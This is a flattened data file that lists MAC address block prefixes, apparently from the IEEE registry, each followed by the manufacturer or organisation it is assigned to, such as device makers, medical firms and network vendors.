Ayla Networks (Shenzhen) Co., Ltd. 1C5974E Globe Tracker ApS 9C431EE SHURE INCORPORATED C4A10E3 Consolinno Energy GmbH 18A59CB CAL-COMP INDUSTRIA E COMERCIO DE ELETRONICOS E INFORMATICA LTDA 381F268 Avon Protection 381F261 SERNET (SUZHOU) TECHNOLOGIES CORPORATION 381F269 SMS Evoko Group AB 3043D77 DIGICITI Technology Co.,Ltd 18A59CC BlueEyes Technology 18A59C5 Thermia AB 3043D72 Apollo Infoways Private Limited 3043D73 Luxshare Electronic Technology (Kunshan) LTD 6C93080 Braums 6C93085 Shenzhen C & D Electronics Co., Ltd. 6C93081 WATERFORD CONSULTANTS LLC 50FF991 COYOTE SYSTEM 0C8629D BEIJING BEIBIANZHIDA TECHNOLOGY CO.,LTD 0C86295 Shenzhen protostellar technology Co., Ltd 0C86299 HONGKONG SAINT TECH INDUSTRIAL LIMITED 0C8629B Akribis Systems 988FE0B Dongguan Synst Electronics Co., LTD. 988FE02 vhf elektronik GmbH 988FE0C Shenzhen Micro&Nano Perception Computing Technology Co.,Ltd 988FE03 Empowerment Technologies Inc. 0826AE3 Shenzhen Hai yingZhilian Industrial Co., Ltd. 0826AE2 ZaiNar 04EEE8C daishin 04EEE8D SHENZHEN TOPWELL TECHNOLOGY CO., LTD. 50A030E HANKOOK CTEC CO,. LTD. 18D793A zhejiang Anhong technology co.,ltd 18D793D Kraken Technologies Ltd 18D7939 Clarity Medical Pvt Ltd DC36434 Fresenius Medical Care R&D (Shanghai) Co.,Ltd. 18D7931 Annapurna labs 50A030D SERNET (SUZHOU) TECHNOLOGIES CORPORATION 94C9B71 C-Mer Rainsoptics Limited 50A030B SHANGHAI ZXELINK Co.,Ltd 94C9B72 Annapurna labs 50A0305 Jiangsu Jinshi Legend Technology Co.,Ltd 1845B38 ShenZhen Topband Co.,Ltd 1845B32 Haier cloud Health Technology (Qingdao) Co., Ltd 1845B30 leetop tech co.,ltd F4700C2 Beijing ASU Tech Co., Ltd. F4700C9 Annapurna labs F4700C6 Jinan USR IOT Technology Limited F4700CD Freeus LLC F4A4545 Denshijiki Industry Co.,Ltd F4A4544 Earshots 1845B31 Pfannenberg GmbH F4A454A Annapurna labs 7872649 SHENZHEN FANGZHICHENG TECHNOLOGY CO., LTD. 7872648 Gsou Technology(Shenzhen)Co.,Ltd 787264D QT systems ab 9880BB4 Shenzhen Ginto E-commerce CO.,LTD 986EE84 Fujitsu component limited 986EE8C Sercomm Corporation. 1CAE3ED FORME 1CAE3E6 Annapurna labs 1CAE3EA Beijing SuperCloud Technology Co., Ltd. 7813057 E-Stone Electronics Co., Ltd 785EE86 Guangdong COROS Sports Technology Co., Ltd 38A8CDE OUTFORM 7C83345 PRO BRAND TECHNOLOGY (TW) 2836137 shenzhen technology limited 44A92C6 Ningbo joyson new energy automotive technology Co.,Ltd 44A92CB Amethystum Storage Technology Co., Ltd 44A92C8 RT-Systemtechnik GmbH 5848492 X-speed lnformation Technology Co.,Ltd 6433B52 Adesso, Inc 44A92C2 Anhui Zhongxin Electronic Technology Co., Ltd. 6433B5C Geksacon A85B36C ATER Technologies Co Ltd A85B363 Shenzhen Dandelion Intelligent Cloud Technology Development Co., LTD F02A2B3 Frigotel SRL A85B365 JUGANU LTD F02A2BC Comexio GmbH 44A92C0 ZHEJIANG HISING TECHNOLOGY CO.,LTD A85B362 Loomanet Inc. 7813053 microtec Sicherheitstechnik GmbH 1874E26 Beijing Jrunion Technology Co., Ltd. 1874E29 SHENZHEN AORO COMMUNICATION EQUIPMENT CO., LTD 1874E2B Shenzhen Jooan Technology Co., Ltd 7813052 LEAFF ENGINEERING SRL 781305C Brigates Microelectronics Co., Ltd. 781305D Shanghai Siminics Optoelectronic Technology Co., Ltd E878298 JVISMall CO.,LTD 1874E22 Shenzhen WITSTECH Co.,Ltd. E878294 Annapurna labs E878297 FAIOT Co., LTD 986D359 Advanced Diagnostics LTD FCD2B6D Bee Smart(Changzhou) Information Technology Co., Ltd 1874E25 HANGZHOU ZHOUJU ELECTRONIC TECHNOLOGICAL CO.,LTD C8F5D62 Qbic Technology Co., Ltd C8F5D64 EVOTOR LLC C8F5D61 Valeo Interior Controls (Shenzhen) Co.,Ltd C0FBF96 IVT corporation C0FBF92 Dongguan Chuan OptoElectronics Limited C0FBF98 Dongmengling C8F5D68 Yarward Electronics Co., Ltd. 88C9B37 Robert Bosch JuP1 88C9B3B Shenzhen MMUI Co.,Ltd 1CA0EF1 Wisnu and Supak Co.,Ltd. 0C5CB5B ADI Global Distribution 1CA0EFD Shenzhen Liandian Communication Technology Co.LTD 601592B Annapurna labs 6015920 S Labs sp. z o.o. 0C5CB55 The Raymond Corporation 6015924 Zaptec 245DFC8 Cosmicnode E86CC78 Lighthouse EIP E86CC72 Xirgo Technologies LLC E86CC74 Koal Software Co., Ltd 245DFC4 Suzhou Jiangzhi electronic technology co., Ltd E86CC7C Limited Liability Company M.S.Korp E86CC70 Trapeze Switzerland GmbH 9827827 KORTEK CORPORATION 9827824 Dspread Technology (Beijing) Inc. 0411197 Herrick Tech Labs 78D4F17 Famar Fueguina S.A. 446FD80 Sichuan subao network technology ltd.co. 78D4F14 BYD Auto lndustry Co.,Ltd 446FD85 ZHEJIANG SHIP ELECTRONICS & TECHNOLOGY CO., LTD. 446FD8C Changzhou Haitu Electronic Technology Co.,Ltd 78D4F19 shanghai baudcom communication device co.,ltd 78D4F15 Huaqin Telecom Technology Co.,Ltd. 885FE81 Apoidea Technology Co., Ltd. A0024A6 Xiaojie Technology (Shenzhen) Co., Ltd A453EE2 Ubisafe Smart Devices A453EE1 Stellamore 8CAE49E Shenzhen C & D Electronics Co., Ltd. 8CAE496 Chengdu BillDTE Technology Co., Ltd 8C476E0 Chipsafer Pte. Ltd. 8CAE49A Gigawave 8C476E9 Xertified AB A453EE9 Dongguan HuaFuu industrial co., LTD 8CAE499 TTR Corporation 8CAE498 LLC Taipit - Measuring Equipment 34049EC ClearCaptions LLC 8C476E2 HuiZhou MIKI Communication Equipment Co.,LTD 8CAE497 Precitec Optronik GmbH 8CAE49C Parametric GmbH 687912A Wingtech Mobile Communications Co., Ltd. 8411C20 Kazdream Technologies LLP 8411C22 Futurecom Systems Group 6879122 CNDI CO.,LTD 8411C24 LLC STC MZTA 687912B Swisscom Broadcast Ltd 6879125 Copper Labs, Inc. 5895D80 Shenzhen DOOGEE Hengtong Technology CO.,LTD 5895D86 Norgren Manufacturing Co., Ltd. 5895D89 Loftie 5895D8A Peak Communications Limited DC4A9E6 TATTILE SRL DC4A9E7 Astrogate Inc. 5895D8C LOCTEK ERGONOMIC TECHNOLOGY CORP. DC4A9E8 Methodex Systems Pvt. Ltd. DC4A9ED HAPPIEST BABY INC. CC4F5CC Beijing Cotytech Technology Co.,LTD. CC4F5C7 Smiths US Innovation LLC CC4F5CB Ontex BV CC4F5C1 lesswire GmbH FCCD2F0 Ningbo Bull Digital Technology Co., LTD CC4F5C4 Spark Biomedical CC4F5C6 Watertech S.p.A. 98FC840 Leia, Inc 98FC84C Shenzhen Incar Technology Co., Ltd. 98FC84D Jazwares LLC 18FDCB3 Staclar, Inc. 18FDCBC Ark Vision Systems GmbH & Co. KG 18FDCB6 SKA Organisation 98FC844 Sferrum GmbH 18FDCBE KWANG YANG MOTOR CO.,LTD 28B77C1 SolarEdge Technologies 28B77C8 Shenzhen PUAS Industrial Co.,LTD 4C93A62 Diehl Controls Nanjing Co., Ltd. C0619A5 Nanjing Balance Network Technology Co., Ltd C0619A7 MAD PIECE LLC. 98FC843 ZeXin (Shanghai) Information Technologies Co.,Ltd C0619AD Uhnder 4C93A63 Commsignia, Ltd. F469D52 Pulsar Engineering srl F469D5C Huaqin Telecom Technology Co.,Ltd. 4C93A64 4TheWall - 4D Sistem A.S F469D57 Rosco, Inc F469D5A ShenZhenShi EVADA technology Co.,Ltd F469D50 Mossman Limited D01411B CYLTek Limited D0D94F7 Mitsubishi Electric US, Inc. 5C857E6 ProdataKey 5C857E4 Shenzhen IP3 Century Intelligent Technology CO.,Ltd 5C857E5 Shanghai Yanhe automation technology co.,LTD D014114 powerall D01411A ABB EVI SPA D014115 Superlead D014119 Airthings F0D7AF3 720?bei jing?Health iTech Co.,Ltd F0D7AFB EVCO SPA 304950A Ledworks SRL 3049501 ATLI WORLD LIMITED 3049502 Sercomm Corporation. F0D7AF7 Rievtech Electronic Co.,Ltd DCE5338 JB-Lighting Lichtanlagen GmbH F0D7AFC Shenzhen Virtual Clusters Information Technology Co.,Ltd. 304950C Anacove LLC 706979A Foxconn Brasil Industria e Comercio Ltda 7069794 SelectTech GeoSpatial, LLC CCC2618 RoomMate AS 38F7CD6 Fast Cotton(Beijing) Limited 706979C Rivian Automotive LLC 14AE852 Qingdao iTechene Technologies Co., Ltd. E8B4707 Tibit Communications D425CC4 Barobo, Inc. 38F7CD3 VANGUARD 38F7CD2 RIPower Co.,Ltd 94FBA79 Shanghai Hyco Genyong Technology Co., Ltd. 38F7CDB Fibergate Inc. 94FBA74 UOI TECHNOLOGY CORPORATION 94FBA70 Reichert Inc. F041C84 Candelic Limited F490CB7 TEQ SA F490CBB A-dec Inc. C09BF46 LTD Delovoy Office E8B4704 YAWATA ELECTRIC INDUSTRIAL CO.,LTD. 9405BBE BAE Systems 9405BB9 Zimmer GmbH 9405BB0 Qingdao Maotran Electronics co., ltd 9405BB2 Dongguan CXWE Technology Co.,Ltd. 9405BB7 closip Inc. F490CBC Cheetah Medical 94CC046 Sam Nazarko Trading Ltd 6462660 MiiVii Dynamics Technology CO.,LTD 94CC04A hyBee Inc. 94CC04D Hanzhuo Information Technology(Shanghai) Ltd. 6462661 Annapurna labs 6462665 Bühler AG 9405BB8 iungo 94CC042 Nanjing Yacer Communication Technology Co. Ltd. 646266E Shenzhen Jie Shi Lian Industrial Co., LTD 6462668 Leontech Limited B0B353E Nanjing Yining Intelligent Technology Co., Ltd. B0B353D IPvideo Corporation B0B3530 Blake UK B0B353B Zoox B0B353C Beijing Geekplus Technology Co.,Ltd. 14AE851 Henfred Technology Co., Ltd. 14AE85A MTA Systems 90E2FC0 PEA (DBT-Technology) 50DE197 Tianjin Natianal Health Technology Co.,Ltd 50DE19A Tannak International AB 50DE199 AEG Identifikationssysteme GmbH 3CFAD37 LIPS Corporation B0B3537 WUUK LABS CORP. 50DE193 TRAXENS 50DE191 Clear Flow by Antiference 3CFAD3B Corelink Technology Co.,Ltd 3CFAD39 Shenzhen Vplus Communication Intelligent Co., Ltd. 3CFAD31 Annapurna labs 50DE192 SPII SPA 402C763 EmbeddedArt AB 200A0DE HANGZHOU DANGBEI NETWORK TECH.Co.,Ltd 200A0DB Amazon Technologies Inc. 200A0D3 Clearly IP Inc A0224EE Hunan Youmei Science&Technology Development Co.,Ltd. 402C761 Shanghai Dahua Scale Factory 200A0DD Bently & EL Co. Ltd. 402C764 Beijing Smarot Technology Co., Ltd. 200A0D6 Austin Hughes Electronics Ltd. A0224E6 MESIT asd, s.r.o. C4954D1 Teletronik AG C4954D6 AKKA Germany GmbH C4954D8 Xinjiang Golden Calf Energy IOT Technology Co., Ltd 80E4DA0 Wheatstone Corporation 0069672 Ningbo Shen Link Communication Technology Co.,Ltd 006967A Zhejiang Holip Electronic Technology Co.,Ltd 0069671 miliwave C4954DA KAT Mekatronik Urunleri AS C4954D4 GL Solutions Inc. A0224EC Standartoptic, Limited Liability Company A83FA18 Neos Ventures Limited 006967D aversix 0069676 Comcast-SRL C4954D0 BA International Electronics Co. Ltd. C4954D7 LLC "TechnoEnergo" 6431391 Livongo Health 4403772 Exsom Computers LLC 4403776 SHEN ZHEN HUAWANG TECHNOLOGY CO; LTD 4403771 Atari, Inc. 4403774 Lenovo Image(Tianjin) Technology Ltd. 440377E Bolin Technology Co., Ltd 506255D COTT Electronics 506255E SHINSOFT CO., LTD. 04D16E5 Dspread Technology (Beijing) Inc. 04D16EE Evolute Systems Private Limited 54A4933 I-MOON TECHNOLOGY CO., LIMITED 54A4930 Intelligent Surveillance Corp 401175E NIBBLE 4011751 Fujian Kuke3D Technology Co.,LTD 4011755 MIRC ELECTRONICS LTD 4011754 Table Trac Inc 4C4BF9A Electrolux Professional AB 10DCB67 Moya Commumication Technology (Shenzhen) Co.,Ltd. 10DCB6A Pickering Interfaces Ltd 4011750 Lexi Devices, Inc. 9806370 Zoleo Inc. 2415105 GANZHOU DEHUIDA TECHNOLOGY CO., LTD 2415102 Nile Global Inc 241510D Helen of Troy 9806375 GS GLOBAL SECURITY INC 208593D Shanghai Kenmyond Industrial Network Equipment Co.,Ltd 208593A H3 Industries, Inc. 208593B IOG Products LLC 241510B Teknic, Inc. 9806371 E. P. Schlumberger B4A2EBC Shanghai Shenou Communication Equipment Co., Ltd. D05F648 TytoCare LTD. FCA47A7 Innovative Advantage 44D5F2A SYS TEC electronic GmbH 44D5F2D Shenzhen Nation RFID Technology Co.,Ltd. D05F64E Montblanc-Simplo GmbH FCA47AA Shenzhen Elebao Technology Co., Ltd FCA47AC Shenzhen ALFEYE Technology CO.,Ltd 44D5F26 Beam Communications Pty Ltd D05F646 Cyrus Technology GmbH 8C593C9 GENIS B4A2EB9 CURRENT WAYS, INC. B4A2EB5 Annapurna labs B4A2EBA Hengkang(Hangzhou)Co.,Ltd 8C593C2 Beida Jade Bird Universal Fire Alarm Device CO.,LTD. 8C593C7 OBO Pro.2 Inc. 2C16BDB LINGDONG TECHNOLOGY (BEIJING) CO. LTD 8C593C4 Guralp Systems Limited 2C16BDC Beijing CHJ Automotive Co., Ltd. B4A2EBB Quantitec GmbH 6095CEB Beijing Sinomedisite Bio-tech Co.,Ltd 1C8259B KeyWest Networks, Inc BC97407 Airfi Oy AB BC97401 comtac AG BC97403 Precision Galaxy Pvt. Ltd BC97405 Shanghai Laisi Information Technology Co.,Ltd 6095CE0 Siema Applications 6095CE8 Trophy SAS 6095CE6 Xiamen Sigmastar Technology Ltd. D0C857E E-T-A Elektrotechnische Apparate GmbH D0C8575 Beijing Inspiry Technology Co., Ltd. 6095CEE VNS Inc. B0FD0B3 DMAC Security LLC B0FD0B8 eSenseLab Ltd. B0FD0BA TEMCO JAPAN CO., LTD. 848BCD2 CCX Technologies Inc. 848BCD5 exodraft a/s 848BCD6 TWTG R&D B.V. 1C82591 3xLOGIC Inc. C863149 Maxcom S.A. C863148 Thinci, Inc. C863141 Autonics Co., Ltd. E41E0A8 SAGE Glass C82C2B6 Grav I.T. C82C2B1 Galgus C82C2BB Kunshan SVL Electric Co.,Ltd C82C2B7 Merpa Bilgi Islem Ltd.Sti C82C2BD UBITRON Co.,LTD 745BC5D CELYSS SAS FCD2B63 Coet Costruzioni Elettrotecniche E44CC7C EPS Bio 4CBC98E Wonder Workshop 4CBC981 JSC NIC 4CBC98A Shenzhen Cogitation Technology Co.,Ltd. A83FA12 MEDCAPTAIN MEDICAL TECHNOLOGY CO., LTD. 745BC5C ComNot 745BC5A Fournie Grospaud Energie SASU E44CC72 Doowon Electronics & Telecom Co.,Ltd D8860B7 Grünbeck Wasseraufbereitung GmbH D8860B0 Inspur Group Co., Ltd. E05A9F6 Fibrain E05A9F9 Gemalto "Document Readers" D8860B5 CAMTRACE CCD39D5 SHENZHEN ROYOLE TECHNOLOGIES CO., LTD. 38B19EB System Q Ltd CCD39DD Ethernity Networks 9C69B45 Elesta GmbH 9C69B4A BEIJING PICOHOOD TECHNOLOGY CO.,LTD 9C69B4B Toughdog Security Systems 6CDFFB1 Chongqing Baoli Yota Technologies Limited 6CDFFB7 Hashtrend AG 4C917A0 Shenzhen Dangs Science & Technology CO.,LTD 4C917A2 Chongqing Unisinsight Technology Co.,Ltd. 4C917AD Shenzhen bankledger Technology Co, Ltd 6CDFFBE Beijing Fimi Technology Co., Ltd. 7CBC845 Nanning auto digital technology co.,LTD 98F9C7D hangzhou soar security technologies limited liability company 2C4835E IROOTECH TECHNOLOGY CO.,LTD 98F9C75 Tonycore Technology Co.,Ltd. 98F9C76 GoodBox 98F9C79 Koala Technology CO., LTD. 0CFE5DE NEWGREEN TECH CO., LTD. 0CFE5DC Bepal Technology Co.,Ltd. 0CFE5D0 Chengdu Ledong Information & Technology Co., Ltd. 6C5C3D8 GUANGZHOU GUANGRI ELEVATOR INDUSTRY CO.,LTD 6C5C3D0 ShenZhen Hugsun Technology Co.,Ltd. 1CFD088 ShenZhen DeLippo Technology Co., LTD 6C5C3D5 Unitel Engineering A83FA16 BEGLEC 1CFD089 Cobham Slip Rings 3C6A2C4 XI'AN YEP TELECOM TECHNOLOGY CO.,LTD 3C6A2CC Eltov System 3C6A2CA Metro 3C6A2CD Xiamen Smarttek CO., Ltd. 3C6A2C8 TP Radio 3C6A2C1 Olibra LLC A83FA11 GTDevice LLC A4ED438 Linseis Messgeraete GmbH A4ED43D Brand New Brand Nordic AB A4ED437 Wuxi Junction Infomation Technology Incorporated Company A028336 Xiamen Caimore Communication Technology Co.,Ltd. A028330 GERSYS GmbH 300A60A Ampetronic Ltd 300A609 WINTEK System Co., Ltd 300A60B Giax GmbH 300A60C Thermo Process Instruments, LP 0055DAE Victorsure Limited 8489EC1 Research Electronics International, LLC. 3009F93 OOO "Microlink-Svyaz" 8489EC6 POCT biotechnology 8489EC8 Arts Digital Technology (HK) Ltd. A02833D Audix A028332 Shanghai Nohmi Secom Fire Protection Equipment Co.,Ltd. 8489ECE Shenzhen Intellifusion Technologies Co., Ltd. 3009F9D Technology for Humankind 9CF6DDB Guangzhou LANGO Electronics Technology Co., Ltd. 8489EC4 Vayyar Imaging Ltd. C08359A SHANGHAI CHARMHOPE INFORMATION TECHNOLOGY CO.,LTD. C083598 ista International GmbH 04C3E6E Teleepoch Ltd 04C3E6A Sealed Unit Parts Co., Inc. C083593 PCH Engineering A/S C08359B Suzhou Siheng Science and Technology Ltd. 9CF6DD1 Ithor IT Co.,Ltd. 9CF6DD9 CAMA(Luoyang)Electronics Co.,Ltd B44BD6B DongYoung media B44BD66 Perspicace Intellegince Technology B44BD63 Huizhou Sunoda Technology Co. Ltd B44BD64 Shenzhen Hi-Net Technology Co., Ltd. 3C427EC Privacy Labs 3C427E5 Geoplan Korea B44BD67 Taizhou convergence Information technology Co.,LTD B44BD60 G4S Monitoring Technologies Ltd D47C44E SHENZHEN ANYSEC TECHNOLOGY CO. LTD 3C427E3 Shenzhen VETAS Communication Technology Co , Ltd. 3C427E2 Starloop Tech Co., Ltd. 1CA0D3E Exicom Tele-Systems Ltd. A019B2B HangZhou iMagic Technology Co., Ltd A019B2D RYD Electronic Technology Co.,Ltd. A019B27 ARIMA Communications Corp. A019B26 GfG mbH D47C44C STRIVE ORTHOPEDICS INC D47C44B OPTiM Corporation D47C447 Pongee Industries Co., Ltd. 2C48357 FAST 2C4835D Phasor Solutions Ltd 3C24F07 Swissdotnet SA 0C73EB4 U-PASS.CO.,LTD 885FE8B Shenzhen ORVIBO Technology Co., Ltd 480BB2C SHENZHEN TOPWELL TECHNOLOGY CO..LTD 480BB29 Microprogram Information Co., Ltd 480BB24 Hangzhou Freely Communication Co., Ltd. 885FE88 Changsha Xiangji-Haidun Technology Co., Ltd 480BB28 BravoCom(xiamen)TechCo.Ltd 88A9A70 Shenzhenshi kechuangzhixian technology Co.LTD 301F9AB Smart Component Technologies LTD 301F9A2 CHISON Medical Technologies Co., Ltd. F041C8D ATN Media Group FZ LLC F041C8A Telstra 88A9A75 Volterman Inc. 88A9A7D AVLINK INDUSTRIAL CO., LTD F041C81 DongGuan Siyoto Electronics Co., Ltd A4DA223 DURATECH Enterprise,LLC A4DA22A Grundig A4DA224 LORIOT AG A4DA22D Shen Zhen City YaKun Electronics Co., Ltd A4DA22B Klashwerks Inc. A4DA227 Hydro Electronic Devices, Inc. C4FFBC5 comtime GmbH C4FFBC1 VISATECH C0., LTD. A4DA225 Original Products Pvt. Ltd. A4DA221 T2T System DCE533B Tintel Hongkong Co.Ltd DCE5332 Remko GmbH & Co. KG DCE5331 Ambi Labs Limited 1C21D1E p2-plus inc. 34298FC Albert Handtmann Maschinenfabrik GmbH&Co.KG 9C431ED HK ELEPHONE Communication Tech Co.,Limited 9C431E0 Antailiye Technology Co.,Ltd 282C025 LLC "MICROTEH" 282C02B ThirdReality, Inc F8B5684 Combiwins Technology Co.,Limited 282C020 SAKATA DENKI Co., Ltd. 282C02A Tokin Limited C4FFBC9 GSM Innovations Pty Ltd 3873EAE Shenzhen Jixian Technology Co., Ltd. F8B5683 Dongwoo Engineering Co.,Ltd F8B5680 LifePrint Products, Inc. F8B5685 etectRx 4048FD9 Plus One Global Ltd. 3873EAD Annapurna labs 8C147D9 Anyware Solutions ApS 3873EAA SHENZHEN CSE TECHNOLOGY CO., LTD 3873EA7 PingGPS Inc 3873EA3 Proch plastic Co., Ltd. 3873EAC LG Electronics 34D0B8A Meatest sro AC1DDFB FINEpowerX INC AC1DDFA WESCO INTEGRATED SUPPLY EC9F0D4 WisIOE 34D0B80 Captec Ltd AC1DDFD Elekon AG AC1DDF1 HellaStorm, Inc. 2C279E6 Rutledge Omni Services Pte Ltd 741AE0C bistos.co.ltd 741AE02 NURA HOLDINGS PTY LTD 2C279EB Forties Inc. 2C279E2 Kunyi electronic technology (Shanghai) Co., Ltd. 741AE00 Huano International Technology Limited 741AE04 Revl Inc. 741AE05 FUJIAN TAILI COMMUNICATION TECHNOLOGY CO.,LTD CC22371 Terma Sp. z o.o. 189BA5C Christ Electronic System GmbH 2C279E0 Changzhou WEBO Weighing Device & System CO.,LTD 34298F4 ISRA Vision AG 2C279ED Jiangsu JianHu Science & Technology Co., Ltd. 34298F9 Wiesheu GmbH 34298F5 Highlite International B.V. 904E911 Apollo Video Technology 28F537A Honeywell Safety Products USA, Inc 34008A7 uberGARD Pte. Ltd. 34008A8 Shenzhen Andakai Technologies Co., Ltd. E818632 AVCON Information Technology Co.,Ltd 34008AA Hibertek International Limited 7CBACC6 Fossil Power Systems Inc 7CBACC5 Fortem Technologies, Inc. 7CBACC9 Yongguan Electronic Technology (D.G)LTD 78D800E CL International 78D800D Korea Micro Wireless Co.,Ltd. 7CBACC3 Izkare 7CBACCA Annapurna labs 4C65A89 SHENZHEN LISAIER TRONICS CO.,LTD F88A3C7 Josh.ai A0C5F2B Oray.com co., LTD. 4C65A8C Fuse 4C65A87 Wuhan MoreQuick Network Technology Co., Ltd. 4C65A81 Beijing Bluehalo Internet Inc. 4C65A80 WELT Corporation 8C147D5 Unwired Networks F023B9E Domotz Ltd 8C147D6 Shenzhen Meidou Technology Co, Ltd. A0C5F2A Serious Integrated, Inc. 04714B4 Apparatebau Gauting GmbH 60D7E3C Zhejiang Send Intelligent Technology,Ltd 04714B8 Energport Inc 60D7E38 HindlePower, Inc 60D7E3B Nextivity 04714B1 uAvionix Corporation 60D7E3E HuBDIC CO.,LTD F023B9C Shenzhen Lachesis Mhealth Co., Ltd. 04714BA Observables, Inc. 98AAFC3 Nexus Electrical(Jiaxing) Limited 98AAFC8 Beijing Tiandi-Marco Electro-Hydraulic Control System Company Ltd. 98AAFC6 Mekotronics Co., Ltd 60D7E3D Quantronix, Inc. 60D7E34 Hemisphere GNSS 08ED02B Szok Energy and Communication Co., Ltd. 08ED029 Savox Communications 08ED02C Guard RFID Solutions 98AAFC4 RPE "RADICO" A411639 accesso Technology Group 144FD76 i-SENS, Inc. 98AAFCD MCS Micronic Computer Systeme GmbH 144FD7B Arkus-ST Ltd 1CA0D3B Guang Dong He Zheng Network Technology Co.,Ltd 40F3857 PALAZZETTI LELIO SPA 8CC8F43 TOHO DENKI IND.CO.,LTD 40F3854 Embedded IQ 40F3853 IntelliDesign Pty Ltd 1CA0D39 Cirque Audio Technology Co., Ltd 8CC8F46 SHENZHEN D-light Technolgy Limited 8CC8F4A Trilux Group Management GmbH 50A4D09 OEM PRODUCTION INC. 50A4D08 XinLian'AnBao(Beijing)Technology Co.,LTD. 8CC8F41 Lanhomex Technology(Shen Zhen)Co.,Ltd. 50A4D07 Shanghai Pujiang Smart Card Systems Co., Ltd. 8CC8F49 Swift Navigation Inc 50A4D00 TRAXENS 8CC8F40 Guardtec,Inc 34049ED uikismart 40ED980 Tsinghua Tongfang Co., LTD 34049E8 Eclipse Information Technologies 34049EB Eginity, Inc. 40ED98B Siebert Industrieelektronik GmbH 40ED987 Vaisala Oyj 50A4D05 TREXOM S.r.l. A4580FD EYE IO, LLC A4580F6 Astro, Inc A4580FA GUANGZHOU OPTICAL BRIDGE COMMUNICATION EQUIPMENT CO.,LTD. 40ED986 Shanghai Broadwan Communications Co.,Ltd 40ED985 Cape 500B917 Shenzhen Xinfa Electronic Co.,ltd 500B918 Panasonic Enterprise Solutions Company 244E7B5 Jiangsu Xuanbo Electronic Technologies Co.,Ltd 244E7B2 RCC TIME CO .,LIMITED 4865EE4 Mission Microwave Technologies, Inc 244E7B4 Leshi Internet Information & Technology (Beijing) Corp. 7CCBE2C mirakonta s.l. 7CCBE28 Polarteknik Oy 244E7BE WithWin Technology ShenZhen CO.,LTD 1CC0E10 Shenzhen Highsharp Electronics Ltd. 1CC0E18 LX Corporation Pty Ltd AC64DDB Groupe Citypassenger Inc 4CE1733 outpaceIO 4CE173E Plus One Japan Limited 4CE173C REMONDE NETWORK 4865EE7 Venture Research Inc. 0CEFAF0 Kenmore 383A212 Shenzhen HS Fiber Communication Equipment CO., LTD AC64DD4 8Cups 383A21D Colooc AB 383A216 Shenzhen Smart-core Technology co., Ltd. F81D78A AVPro Global Holdings LLC 383A214 Dongguan Innovation Technology Co Ltd AC64DD1 JSC InfoTeCS F81D784 Digital Imaging Technology F81D783 SHANGHAI SUN TELECOMMUNICATION CO., LTD. F81D78D Tofino 70F8E7C Fixstars Corporation 70F8E72 VOXX International 84E0F4E Scale-Tec Ltd. 84E0F42 Hangzhou Uni-Ubi Co.,Ltd. C0D3919 xxter bv 58E8765 Broad Air Technology Co., LTD. 58E876D Xiamen Cacamle Technology Co.,Ltd. 58E8763 McWong International Inc F0ACD71 Intenta GmbH F0ACD72 QUANTUM POWER SYSTEMS 58E876B Annapurna labs C0D3917 ALNETz Co.,LTD F0ACD70 Guilin glsun Science and Tech Co.,LTD F0ACD73 Med-Pat/Inn-Phone 283638E SCA Hygiene Products AB 283638B ShangHai Canall Information Technology Co.,Ltd 2836388 Havells India Limited 2836387 Innovative Technology Ltd 8C192DA TeleAlarm SA 8C192D1 Shenzhen Huanuo Internet Technology Co.,Ltd D0D94F5 Optigo Networks D0D94F8 Apption Labs Limited 8C192D2 DataRemote Inc. D0D94F0 Perfant Technology Co., Ltd D0D94F3 Beijing Yiwangxuntong Technology D0D94F4 peiker CEE C47C8D9 Airbus DS - SLC C47C8D7 Awiselink Co., Ltd. C47C8DC INOTEC Sicherheitstechnik GmbH C47C8D5 PASCAL Co., Ltd. CCD31EA Haishu Technology LIMITED 6891D0B Altis Technology C47C8D6 HHCC Plant Technology Co.,Ltd. CCD31EB Elk Products 6891D07 Omniimpex GmbH E0B6F54 Agora 6891D0A WiseCube 50FF99B Sichuan Dowlab Electronics Technology Co. Ltd E0B6F5D ITEL MOBILE LIMITED E0B6F5A Folksam AB 50FF99C Goetting KG 50FF99D Shenzhen Haipengxin Electronic Co., Ltd. 5CF286D BrightSky, LLC 5CF2863 beijing your wonderful control system technology co.,ltd 5CF2865 EUROIMMUN Medizinische Labordiagnostika AG 986D351 Shenzhen cositea electronics technology co.,LTD 7C477CC Annapurna labs 7C477C3 EyeLock LLC 986D358 Beijing 3CAVI Tech Co.,Ltd 5CF2866 VPInstruments 5CF2862 Shanghai Notion Information Technology CO.,LTD. 5CF286C Sunpet Industries Limited 5CF2868 SHENZHEN HIVT TECHNOLOGY CO.,LTD 38FDFEE iSmart electronic technology co.,LTD 38FDFE7 Rademacher Geraete-Elektronik GmbH 38FDFE2 Smart Solution Technology, Inc 38B8EBE Wyres SAS 78CA830 DAINCUBE 78CA831 Excelocity Inc. 78CA839 Louroe Electronics 38B8EB5 Dojo-Labs Ltd 1C88792 Airsmart System Co.,Ltd 1C88796 Eolos IT Corp 1C8879C Accriva 1C87796 Shenzhen Shouxin Tongda Technology Co.,Ltd 1C87795 BEIDIAN GROUP 1C87761 EBS Sp. z o.o. 1C8779D Shenzhen Innovaconn Systems Co.,Ltd 1C8779C AllThingsTalk 8439BED Shenzhen Lidaxun Digital Technology Co.,Ltd 8439BEC EDC Electronic Design Chemnitz GmbH 8439BEA Emotiq s.r.l. 40A36B9 PH Technical Labs 800A802 Sumitomo Wiring Systems, Ltd. 800A804 LLVISION TECHNOLOGY CO.,LTD 800A803 Beijing VControl Technology Co., Ltd. 0055DAB Interaxon Inc 0055DAD Arrow Electronics,Inc. CC1BE09 MobiStor Technology Inc. CC1BE08 MDT technologies GmbH CC1BE03 Shenzhen Vanstor Technology Co.,Ltd CC1BE06 IC RealTech CC1BE0D NEWSTAR (HK) ELECTRONIC DEVELOPMENT LIMITED A03E6B2 Videx Electronics S.p.A. A03E6B8 718th Research Institute of CSIC A03E6B9 Incogniteam Ltd. C88ED16 Shenyang Machine Tool(Group) Research & Design Institute Co., Ltd, Shanghai Branch 0055DA2 Beijing Connected Information Technology Co.,Ltd. A03E6B5 Friday Lab, UAB C88ED1A AP Sensing GmbH C88ED12 ROTRONIC AG 1C21D19 Dynojet Research 1C21D15 B-Scada Inc. A03E6BC Qunar.com B0C5CA8 Astyx GmbH DC44278 Wharton Electronics Ltd DC44273 General Microsystems Sdn Bhd B0C5CA1 IVK-SAYANY DC44270 Suritel B0C5CA5 SYSTOVI 78C2C00 Shenzhen ELI Technology co.,ltd B437D13 DIMTON CO.,LTD. B437D11 Alturna Networks B437D12 Fibersystem AB 74F8DB5 Provision-ISR 78C2C0B Wan Chao An (Beijing) Technology Co., Ltd. 807B85C SCALA Digital 